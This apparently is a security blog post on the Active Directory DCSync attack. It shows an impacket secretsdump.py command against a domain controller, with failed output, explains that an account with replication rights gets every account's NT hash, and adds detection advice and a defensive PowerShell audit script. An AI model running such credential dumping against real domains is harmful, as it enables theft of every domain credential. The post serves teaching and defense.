Within an Active Directory network, it is useful to have a backup Domain Controller so that if the primary fails, a second one can take over. If your workplace is hit by ransomware, you may have a hot site so that you can be back up and running in a few minutes. These are all valid reasons that an account might hold a very dangerous set of permissions on the domain object: “Replicating Directory Changes”, “Replicating Directory Changes All” and, lastly, “Replicating Directory Changes in Filtered Set”. Abusing these rights to ask a Domain Controller for account secrets, exactly as a replication partner would, is commonly referred to as “DCSync”, or Domain Controller Sync.
Attack
We will primarily be working with the impacket tool “secretsdump.py” this time around. Access to an ordinary user account will not suffice: as described above, an account holding the Replicating Directory Changes rights is required. This is what happens when an account without these privileges attempts to perform the attack.
┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #./secretsdump.py -dc-ip 10.13.37.10 spookysec.local/svc-demo:manager@10.10.10.123
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Two things failed here. The first error is secretsdump being unable to dump the local SAM and LSA secrets over the remote registry, which needs local administrator rights on the target. It then falls back to the DRSUAPI replication call, which fails because the account lacks the replication rights. If you’re not careful, this could trigger an Intrusion Prevention/Detection System alert: a replication request arriving from a host that is not a Domain Controller is a well-known detection, and with Directory Service Access auditing enabled it shows up on the DC as Event ID 4662 carrying the DS-Replication-Get-Changes property GUIDs.
With an account that does hold these rights the attack succeeds with ease, and the output contains the NT hash of every account in the domain, krbtgt included.
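Because legitimate holders of these rights exist, the practical check is to list who has them on your own domain object before an attacker does. The following is an added example, not code from the original post; it assumes the RSAT ActiveDirectory module is available and that it is run from a domain-joined session (reading the domain head’s ACL needs no special privileges). The GUIDs are the schema’s well-known extended-right identifiers for the three replication rights.

```powershell
# Added example: enumerate principals granted DCSync-capable rights on the domain head.
# Assumes the ActiveDirectory module (RSAT) and a domain-joined session.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs from the AD schema.
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

$domainDn = (Get-ADDomain).DistinguishedName
$acl      = Get-Acl -Path "AD:\$domainDn"

$acl.Access |
    Where-Object { $_.AccessControlType -eq 'Allow' } |
    ForEach-Object {
        $ace  = $_
        $guid = $ace.ObjectType.ToString()
        $right = $null

        if ($replRights.ContainsKey($guid)) {
            # Explicit grant of one of the three replication rights.
            $right = $replRights[$guid]
        }
        elseif ($ace.ActiveDirectoryRights -match 'GenericAll') {
            # Full control implies every extended right, including replication.
            $right = 'GenericAll (implies all replication rights)'
        }
        elseif ($ace.ActiveDirectoryRights -match 'ExtendedRight' -and
                $ace.ObjectType -eq [guid]::Empty) {
            # An ExtendedRight ACE with an empty ObjectType grants ALL extended rights.
            $right = 'All extended rights (implies all replication rights)'
        }

        if ($right) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference
                Right     = $right
                Inherited = $ace.IsInherited
            }
        }
    } |
    Sort-Object Identity, Right |
    Format-Table -AutoSize
```

By default you should expect to see only the Domain Controllers and Enterprise Domain Controllers groups, Administrators, Domain Admins and Enterprise Admins; in environments synchronising to Azure AD, the Azure AD Connect service account (typically named MSOL_…) legitimately holds these rights as well. Any other principal in the list, especially a plain user or service account, is a DCSync path and should be justified or removed.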